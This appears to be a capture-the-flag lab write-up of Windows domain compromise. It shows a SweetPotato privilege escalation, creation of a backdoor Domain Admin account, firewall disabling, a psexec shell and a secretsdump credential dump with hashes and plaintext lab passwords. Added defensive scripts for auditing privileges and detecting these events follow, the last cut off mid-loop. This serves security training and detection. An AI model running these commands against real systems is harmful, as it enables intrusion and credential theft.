SweetPotato
As discovered previously, the oliver user with the Jenkins security context is a service account with membership in the NT AUTHORITY\SERVICE group. The user also has SeImpersonatePrivilege enabled, which makes the target system vulnerable to the potato exploits. While JuicyPotato for token impersonation does not work on anything above Windows 10 1809 and Windows Server 2019, I should be able to use SweetPotato.
SweetPotato is a collection of various native Windows privilege escalation techniques from service accounts to SYSTEM. It was created by @_EthicalChaos_ and includes:
- RottenPotato
- Weaponized JuicyPotato with BITS WinRM discovery
- PrintSpoofer discovery and original exploit
- EfsRpc built on EfsPotato
- PetitPotam
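The precondition shared by every technique in that list is a token that holds SeImpersonatePrivilege (or SeAssignPrimaryTokenPrivilege), which service accounts get by default. The Python script below is an added example written for this page, not part of this write-up or of SweetPotato: it parses the text that `whoami /all` produces (the same layout that appears further down in this page) and reports whether a token meets that precondition and whether it runs in a service security context, which is how a defender can audit service accounts such as the one Jenkins runs under. The embedded `whoami /all` sample is constructed, and the function names are this example's own.

```python
import re

# Privileges that allow a process to impersonate or assign another token; holding either
# one is the precondition the potato family of local privilege escalations relies on.
TOKEN_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

# Well-known SIDs: NT AUTHORITY\SERVICE, LOCAL SERVICE, NETWORK SERVICE.
SERVICE_SIDS = {"S-1-5-6", "S-1-5-19", "S-1-5-20"}

SID_RE = re.compile(r"\bS-1-\d+(?:-\d+)+\b")

# Constructed sample in the layout of `whoami /all` (not captured from a real host).
SAMPLE = r"""
USER INFORMATION
----------------

User Name      SID
============== =============================================
object\oliver  S-1-5-21-1111111111-2222222222-3333333333-1103


GROUP INFORMATION
-----------------

Group Name                       Type             SID      Attributes
================================ ================ ======== ==================================================
Everyone                         Well-known group S-1-1-0  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE             Well-known group S-1-5-6  Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
"""


def split_sections(text):
    """Group the lines of `whoami /all` output under their section titles.

    A title is a line immediately followed by a dashed underline, e.g.
    'PRIVILEGES INFORMATION' / '----------------------'.
    """
    lines = text.splitlines()
    sections, current = {}, None
    for i, line in enumerate(lines):
        nxt = lines[i + 1].strip() if i + 1 < len(lines) else ""
        if nxt and set(nxt) == {"-"}:
            current = line.strip()
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def parse_privileges(text):
    """Map privilege name -> state ('Enabled' or 'Disabled') from the PRIVILEGES table."""
    privs = {}
    for line in split_sections(text).get("PRIVILEGES INFORMATION", []):
        parts = line.split()
        # Data rows start with the Se* privilege name and end with the State column.
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1]
    return privs


def parse_group_sids(text):
    """Collect every SID listed in the GROUP INFORMATION table."""
    sids = set()
    for line in split_sections(text).get("GROUP INFORMATION", []):
        sids.update(SID_RE.findall(line))
    return sids


def assess_token(text):
    """Return (precondition_met, findings) for one `whoami /all` dump.

    precondition_met is True when a token-impersonation privilege is enabled; the
    service-context finding is reported because it is the usual reason the privilege
    is present in the first place.
    """
    privs = parse_privileges(text)
    sids = parse_group_sids(text)
    enabled = sorted(p for p in TOKEN_PRIVS if privs.get(p) == "Enabled")
    findings = []
    if enabled:
        findings.append("enabled token-impersonation privilege(s): " + ", ".join(enabled))
    if sids & SERVICE_SIDS:
        findings.append("service security context: " + ", ".join(sorted(sids & SERVICE_SIDS)))
    return bool(enabled), findings


if __name__ == "__main__":
    met, findings = assess_token(SAMPLE)
    print("potato precondition met" if met else "potato precondition not met")
    for finding in findings:
        print(" -", finding)
```

Run against the real output of `whoami /all` from each service account you care about; a hit means the account should either lose the privilege (it can be removed per account through User Rights Assignment) or be treated as equivalent to SYSTEM on that host when scoping what it can reach.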
Exploit
The binary can be downloaded from the official GitHub repo
Exploitation
*evil-winrm* ps c:\Users\oliver\Documents> upload SweetPotato.exe C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/SweetPotato.exe to C:\tmp\
data: 1234944 bytes of 1234944 bytes copied
info: Upload successful!
*evil-winrm* ps c:\Users\oliver\Documents> upload pe.exe C:\tmp\
info: Uploading /home/kali/archive/htb/labs/object/pe.exe to C:\tmp\
data: 15872 bytes of 15872 bytes copied
info: Upload successful!
I will upload the exploit and payload through the existing PowerShell session
*evil-winrm* ps c:\Users\oliver\Documents> .\SweetPotato.exe --help
SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
-c, --clsid=value clsid (default bits:
4991D34B-80A1-4291-83B6-3328366B9097)
-m, --method=VALUE Auto,User,Thread (default Auto)
-p, --prog=VALUE Program to launch (default cmd.exe)
-a, --args=VALUE Arguments for program (default null)
-e, --exploit=VALUE Exploit mode
[DCOM|WinRM|EfsRpc|PrintSpoofer(default)]
-l, --listenPort=VALUE COM server listen port (default 6666)
-h, --help Display this help
The exploit also has a help menu for the different methods. While the transfer was done through the existing PowerShell session, execution must be done in the Jenkins security context.
Initial Fail
The command above uses the EfsRpc method, which targets the MS-EFSR EfsRpcOpenFileRaw call, abusing SeImpersonatePrivilege. The exploit appears to be a success. However, nothing came through on the Netcat listener on Kali.
There are a few possible causes for this:
- The firewall is restricting outbound connections
- The payload failed
Due to the potential issues above, I will first need to validate whether command execution is actually being invoked.
Validation
c:\tmp\SweetPotato.exe -p "cmd.exe" -a "/c whoami.exe /all > c:\tmp\who.txt" -e EfsRpc
By default, the SweetPotato exploit launches cmd.exe, but I will specify it just in case. The command above writes the output of the whoami.exe /all command to the c:\tmp\who.txt file.
*evil-winrm* ps c:\tmp> ls
directory: C:\tmp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/20/2023 8:15 AM 15872 pe.exe
-a---- 9/20/2023 7:28 AM 152001 peas.txt
-a---- 9/20/2023 7:29 AM 926208 SweetPotato.exe
-a---- 9/20/2023 8:26 AM 5007 who.txt
-a---- 9/20/2023 6:43 AM 1969152 winPEASany.exe
There is the who.txt file in the c:\tmp directory, which suggests that the exploit indeed worked.
*evil-winrm* ps c:\tmp> cat who.txt
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label S-1-16-16384
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
Confirmed
Adding to Domain Admins
C:\tmp\SweetPotato.exe -p "cmd.exe" -a "/c net user /ADD badmin Qwer1234 && net localgroup administrators /ADD badmin" -e EfsRpc
Leveraging the cmd.exe executable, I can create a local admin user, badmin. This way, I don’t need to bother with either the payload or the firewall.
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ evil-winrm -i $IP -u badmin -p 'Qwer1234'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\badmin\Documents> net group /DOMAIN "Domain Admins" /ADD badmin
The command completed successfully.
A PowerShell session is established as the badmin user. Now, with the privileges of a local administrator, I will add the newly created badmin user to the Domain Admins group.
*Evil-WinRM* PS C:\Users\badmin\Documents> net groups /Domain "Domain Admins"
Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
Administrator badmin
The command completed successfully.
*Evil-WinRM* PS C:\Users\badmin\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============= ==============================================
object\badmin S-1-5-21-4088429403-1159899800-2753317549-7601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\badmin\Documents> hostname
jenkins
*Evil-WinRM* PS C:\Users\badmin\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::20c
IPv6 Address. . . . . . . . . . . : dead:beef::f00b:8831:17ef:6c30
Link-local IPv6 Address . . . . . : fe80::f00b:8831:17ef:6c30%12
IPv4 Address. . . . . . . . . . . : 10.10.11.132
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
Done
Shell Drop
*evil-winrm* ps c:\Users\badmin\Documents> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Disabling the firewall
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ impacket-psexec object.local/badmin:Qwer1234@jenkins.object.local -dc-ip $IP 130 ⨯
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on jenkins.object.local.....
[*] Found writable share ADMIN$
[*] Uploading file fWgwBbgH.exe
[*] Opening SVCManager on jenkins.object.local.....
[*] Creating service Gfrp on jenkins.object.local.....
[*] Starting service Gfrp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2114]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\Windows\system32> whoami
nt authority\system
c:\Windows\system32> hostname
jenkins
c:\Windows\system32> ipconfig
Windows IP Configuration
ethernet adapter ethernet0:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::239
ipv6 address. . . . . . . . . . . : dead:beef::8b9:62bc:32b2:9cb2
link-local ipv6 address . . . . . : fe80::8b9:62bc:32b2:9cb2%12
ipv4 address. . . . . . . . . . . : 10.10.11.132
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%12
10.10.10.2
System Level Compromise
Hashdump
*Evil-WinRM* PS C:\Users\badmin\Documents> Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False
Disabling the firewall
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ rustscan -a $IP -b 25000
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
Open 10.10.11.132:53
Open 10.10.11.132:80
Open 10.10.11.132:88
Open 10.10.11.132:135
Open 10.10.11.132:139
Open 10.10.11.132:389
Open 10.10.11.132:445
Open 10.10.11.132:464
Open 10.10.11.132:593
Open 10.10.11.132:636
Open 10.10.11.132:3268
Open 10.10.11.132:3269
Open 10.10.11.132:5985
Open 10.10.11.132:8080
Open 10.10.11.132:9389
Now I can reach those regular AD services.
┌──(kali㉿kali)-[~/archive/htb/labs/object]
└─$ impacket-secretsdump OBJECT.LOCAL/badmin:Qwer1234@jenkins.object.local -debug
Impacket v0.11.0 - Copyright 2023 Fortra
[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.11/site-packages/impacket
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0xad7915b8e6d4f9ee383a5176349739e3
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2d83ac238ce0bf56a0538c867bcb04a3:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC
OBJECT\JENKINS$:aes256-cts-hmac-sha1-96:25bf7969871170e71cec01384e4a6b42d37bc5eafb38022e1518aa59fba9f841
OBJECT\JENKINS$:aes128-cts-hmac-sha1-96:e049ba9256fea4457e3b1008cb447d2b
OBJECT\JENKINS$:des-cbc-md5:e38f76a43402266e
OBJECT\JENKINS$:plain_password_hex:c516ec95139214a8f77a6aa1e1b18a67bb59072eea2925df5e182ee2e0199173df5531976aaaa64d95de7eee44a674e93d13681585a65c822ffc8b28413363ecf43163a6e2ba08a40579a213ae1ff8f8cf087471b182d4a7f6e9307f51f39e74ee73d71a47de9aa5c40ff3acebb2d9c6e7d6f0aaad16ddcabc5ab9273521e2be3f6225ada137730925b509b766cbb3015b8c9cb8add107233e71d29c05d3f13666b1f73bebee5fcef9b6bb687b8b7768bb6156f969d2307a4fba236ad0c6afb815b2293107cc359c77232d3b84b4ee0a977f08ba0c47c318b8d01baf1a96446571ad673ef7c35eb009c39e90a91a9816
OBJECT\JENKINS$:aad3b435b51404eeaad3b435b51404ee:52a944f0993a167ecfe952c304f318f6:::
[+] Looking into DefaultPassword
[*] DefaultPassword
OBJECT\administrator:n0w_u_s33_m3_0_o
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM
dpapi_machinekey:0xee3ee8172d485d91d928e75a6199a2d9d1552d2a
dpapi_userkey:0x872350e7691cd1f10c04962e21f42f7921a64796
[+] Looking into NL$KM
[*] NL$KM
0000 4D 9A AB A3 5A 7A 2F 50 25 FC 83 1A 10 FE 1E A5 M...Zz/P%.......
0010 D3 B9 9D A8 B5 4E EB 60 2B D6 78 53 7B 73 2A E0 .....N.`+.xS{s*.
0020 44 A8 77 0C 48 36 37 26 80 D0 2C 90 D4 16 AA E5 D.w.H67&..,.....
0030 66 53 4B 7F A9 2D 50 99 8A 26 0A 20 40 0D 9B E1 fSK..-P..&. @...
NL$KM:4d9aaba35a7a2f5025fc831a10fe1ea5d3b99da8b54eeb602bd678537b732ae044a8770c4836372680d02c90d416aae566534b7fa92d50998a260a20400d9be1
[+] Looking into _SC_Jenkins
[*] _SC_Jenkins
OBJECT\oliver:c1cdfun_d2434
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[+] Session resume file will be sessionresume_CfcejRjS
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-500
[+] Calling DRSGetNCChanges for {db5685f4-aee6-4cbc-be31-08997025df10}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Administrator,CN=Users,DC=object,DC=local
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2c535031ee490da0a41327b6ed228acd:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-501
[+] Calling DRSGetNCChanges for {ec61ff21-35ba-4281-8bf0-c941fb5f757e}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Guest,CN=Users,DC=object,DC=local
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-502
[+] Calling DRSGetNCChanges for {f95afbaf-b546-4c4f-a8f0-f45ebc7b3cea}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=krbtgt,CN=Users,DC=object,DC=local
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a2949eeb5f9dc9e0e295c85e2ee83043:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1103
[+] Calling DRSGetNCChanges for {5413283d-6310-418b-9bd1-472ffc1f932d}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Olivar Ava,CN=Users,DC=object,DC=local
object.local\oliver:1103:aad3b435b51404eeaad3b435b51404ee:cae9745fc314e1586606ea8ff899b45a:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1104
[+] Calling DRSGetNCChanges for {742c4a19-245f-42f0-829a-e30dcd298739}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=Smith William,CN=Users,DC=object,DC=local
object.local\smith:1104:aad3b435b51404eeaad3b435b51404ee:742b7f2ccff4ca60d6d378eda85b9b09:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1106
[+] Calling DRSGetNCChanges for {9340fcdd-2f1e-4f89-bafe-e1dcdd5c2b6f}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=maria garcia,CN=Users,DC=object,DC=local
object.local\maria:1106:aad3b435b51404eeaad3b435b51404ee:fea9359fe981f9dc1e72ee60a1a6d3ca:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-7601
[+] Calling DRSGetNCChanges for {6b736a0f-9b49-46a7-91bc-3ba7d2f12a22}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=badmin,CN=Users,DC=object,DC=local
badmin:7601:aad3b435b51404eeaad3b435b51404ee:91ff0fb948167eb4d080b5330686c02f:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Calling DRSCrackNames for S-1-5-21-4088429403-1159899800-2753317549-1000
[+] Calling DRSGetNCChanges for {f11ae853-8e36-4225-b5fe-7b882055f330}
[+] Entering NTDSHashes.__decryptHash
[+] Decrypting hash for user: CN=JENKINS,OU=Domain Controllers,DC=object,DC=local
JENKINS$:1000:aad3b435b51404eeaad3b435b51404ee:52a944f0993a167ecfe952c304f318f6:::
[+] Leaving NTDSHashes.__decryptHash
[+] Entering NTDSHashes.__decryptSupplementalInfo
[+] Leaving NTDSHashes.__decryptSupplementalInfo
[+] Finished processing and printing user's hashes, now printing supplemental information
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:fd8b7324ebbeaf62392d39e893ff88260e14069a22205714aeb8c5932c611f4e
Administrator:aes128-cts-hmac-sha1-96:064bdb023a7e084507df03cc7d144747
Administrator:des-cbc-md5:5db962a137253ef4
krbtgt:aes256-cts-hmac-sha1-96:de7940c3a343b98a3ee6b61e94d2e0f208b2f138f42b9546409b387bd6a98289
krbtgt:aes128-cts-hmac-sha1-96:f3a679e20ef4c68419a4b152f0029081
krbtgt:des-cbc-md5:a823f83dc2083dc1
object.local\oliver:aes256-cts-hmac-sha1-96:4bfc34f04a5becda41922fd4ad819952d20a595f9a90262a090ccf6d78be0558
object.local\oliver:aes128-cts-hmac-sha1-96:028e96399e78bc001ac7bc276d819c88
object.local\oliver:des-cbc-md5:2fc82c9b2f7a02ec
object.local\smith:aes256-cts-hmac-sha1-96:f1e17bbe5fa70dc3c9675b6c71f1b96d6a9366e600a4d474354a4b9d5f834f47
object.local\smith:aes128-cts-hmac-sha1-96:244448cceb0c0c56c5525b6b0eaf9501
object.local\smith:des-cbc-md5:0b7ceaeab9374a46
object.local\maria:aes256-cts-hmac-sha1-96:80b6a51863012607396ba672989b015242a6626065405990502b26ac31ac293e
object.local\maria:aes128-cts-hmac-sha1-96:bf6a68fb3497c8c191cec62b3f4988e5
object.local\maria:des-cbc-md5:4fdcb6895479e983
badmin:aes256-cts-hmac-sha1-96:f4d0381c1f7417bf9923cbf0b7bc579e673cbb6a791ed9832ff0bdd0a0f69869
badmin:aes128-cts-hmac-sha1-96:c007d1fc53a876ccb0a3dc3b5f457a5b
badmin:des-cbc-md5:d316dac708d038e5
JENKINS$:aes256-cts-hmac-sha1-96:25bf7969871170e71cec01384e4a6b42d37bc5eafb38022e1518aa59fba9f841
JENKINS$:aes128-cts-hmac-sha1-96:e049ba9256fea4457e3b1008cb447d2b
JENKINS$:des-cbc-md5:c7809b378a83d9a2
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Domain Level Compromise
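Each of the steps in this write-up leaves a distinct trace in Windows event logs: creating badmin and adding it to Administrators and Domain Admins (Security events 4720, 4732 and 4728), the psexec-style service drop (System event 7045 with a binary sitting in the root of ADMIN$), and the DRSUAPI replication that secretsdump performs (Security event 4662 carrying the DS-Replication-Get-Changes rights). The Python script below is an added detection example written for this page, not part of the write-up or of Impacket; it runs simple rules over constructed JSON-lines events whose field names follow the Windows event XML and whose values echo this write-up's names. The event IDs and extended-right GUIDs are real; the sample events, the `detect`/`scan` names and the rule logic are this example's own.

```python
import json
import re

# Extended rights a DCSync-style dump exercises (GUIDs from the AD schema).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",  # DS-Replication-Get-Changes-All
}
PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")
# A service binary placed directly in the Windows root, i.e. the root of the ADMIN$ share,
# which is where psexec-style tools drop their payload before registering a service.
ADMIN_SHARE_EXE = re.compile(r'^"?(?:%systemroot%|c:\\windows)\\[^\\]+\.exe"?$', re.IGNORECASE)

# Constructed events, one JSON object per line. Field names follow the Windows event XML;
# the values echo the names used in this write-up but were not captured from a host.
SAMPLE_LOG = r'''
{"EventID": 4624, "SubjectUserName": "oliver", "LogonType": 3}
{"EventID": 4720, "SubjectUserName": "JENKINS$", "TargetUserName": "badmin"}
{"EventID": 4732, "SubjectUserName": "JENKINS$", "TargetUserName": "Administrators", "MemberName": "CN=badmin,CN=Users,DC=object,DC=local"}
{"EventID": 4728, "SubjectUserName": "badmin", "TargetUserName": "Domain Admins", "MemberName": "CN=badmin,CN=Users,DC=object,DC=local"}
{"EventID": 7045, "ServiceName": "Gfrp", "ImagePath": "%systemroot%\\fWgwBbgH.exe", "AccountName": "LocalSystem"}
{"EventID": 7045, "ServiceName": "Jenkins", "ImagePath": "C:\\Program Files\\Jenkins\\jenkins.exe", "AccountName": "object\\oliver"}
{"EventID": 4662, "SubjectUserName": "JENKINS$", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"}
{"EventID": 4662, "SubjectUserName": "badmin", "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"}
'''


def detect(event):
    """Return (rule, detail) when one rule matches the event, else None."""
    eid = event.get("EventID")
    who = event.get("SubjectUserName", "?")
    if eid == 4720:
        return ("account-created", f"{who} created account {event.get('TargetUserName')}")
    if eid in (4728, 4732) and event.get("TargetUserName") in PRIVILEGED_GROUPS:
        return ("privileged-group-add",
                f"{who} added {event.get('MemberName')} to {event.get('TargetUserName')}")
    if eid == 7045 and ADMIN_SHARE_EXE.match(event.get("ImagePath", "")):
        return ("admin-share-service",
                f"service {event.get('ServiceName')} installed from {event.get('ImagePath')}")
    if eid == 4662:
        rights = set(GUID_RE.findall(event.get("Properties", "").lower()))
        # Domain controllers replicate with their machine accounts (name ends in '$');
        # a user account exercising replication rights is the DCSync signature.
        if rights & REPLICATION_RIGHTS and not who.endswith("$"):
            return ("dcsync-like-replication", f"{who} exercised directory replication rights")
    return None


def scan(log_text):
    """Apply detect() to every JSON line and return the hits in log order."""
    hits = []
    for line in log_text.strip().splitlines():
        hit = detect(json.loads(line))
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_LOG):
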